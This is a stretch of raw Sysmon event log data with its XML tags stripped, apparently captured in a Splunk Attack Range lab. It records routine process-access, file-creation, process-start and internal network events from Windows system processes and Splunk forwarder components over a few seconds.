21:51:50.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918724Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918723Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.495{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B476-605B-9C69-00000000AE01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918722Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.494{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918721Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.493{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918720Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.493{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918719Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.493{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918718Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.493{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B476-605B-9C69-00000000AE01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918717Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.493{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B476-605B-9C69-00000000AE01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918716Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.485{896A638B-B476-605B-9C69-00000000AE01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918715Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.377{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA8909F201E0B41177FBDF0A9CB770B,SHA256=F6EAD9DCB3A20927C1019D8E3FF976C5C8A359DC7AA1BD5576A393B5A38342EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918714Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:50.272{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D706BF9ED77223BC5B4DEA242468EE2,SHA256=5BF6FDB3416F14D57C304196B942DD30AC1195E28109B3AB11F16488D50DE0F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918730Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:48.809{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1063-false10.0.1.12-8000- 10341000x80000000000000005918729Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:51.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918728Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:51.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918727Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:51.495{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=582902C200A1A9C28452E23105EA60A8,SHA256=A0F047ED459CA107FAD93EB934584B1A691FDB2BDA74EAD0CA472E07BA6BA688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918726Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:51.386{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF4A6BCB575E3BDB82A7F7660109AC1,SHA256=AAF868D96B67D9916505CE41686479E7B82A51AC07DDD767727BC1FEF5A64DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638860Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:51.209{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AF1241D064348401DF15B4AD1BEA890,SHA256=CB263C75B13D0EDFA63D40B4D83625385DC847234B9DB7414B6AE53C51016042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638859Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:51.209{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D64DB547C8270A0E96B91FE0AA26A530,SHA256=38C1DCCA35709B33C139E75E405F7CBD4697E5AC8B5C9DD852503799DF8D0A7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918733Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:52.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918732Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:52.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918731Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:52.400{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE9FD59B51F1374F62A61978EE86471B,SHA256=1CF50B0C13AB6D4EEFD16C5774BCE8B39BBFCC40A0707F6A6A976284C6CCCD82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638862Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:52.224{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9406D435F99F56C61CE2388CA0C60BC7,SHA256=5AAE2EA7E28ED9411BE07D2B4A1CCBD894A792780ACDA711713399B9EBA94836,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638861Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:47.472{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57278-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005918737Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:53.828{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\datareporting\aborted-session-pingMD5=D3D2E3C9A4C73F24427FD4EAEC99DEAF,SHA256=6083B0BD10999C83EBFD26DC5B81DF3201F3F5FB39054BCB8B44596FF89073D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918736Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:53.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918735Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:53.765{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918734Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:53.470{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18A9D10EEE113CDE6EF5164AF2CEFAD2,SHA256=8CD0FF276174575DCFA93A5B077F68AD943728CE806A8082394AA5B0B669F246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638863Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:53.240{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7BCF0E8BEE4BC58381F218FCA616EC4,SHA256=F0F82F6F5B206BEF69DC7CE3D56677438A0DAF4C0923491573194E6ECC4E9B51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918740Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:54.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918739Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:54.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918738Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:54.705{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA846F5C461527BA28E421F158FB8C14,SHA256=FA229F6F30C72F301E701DC5A26A6E2628A58FE58CB905E38E58949A77F48FBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638877Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B47A-605B-375A-00000000AF01}820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638876Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638875Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638874Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:54.740{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638873Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 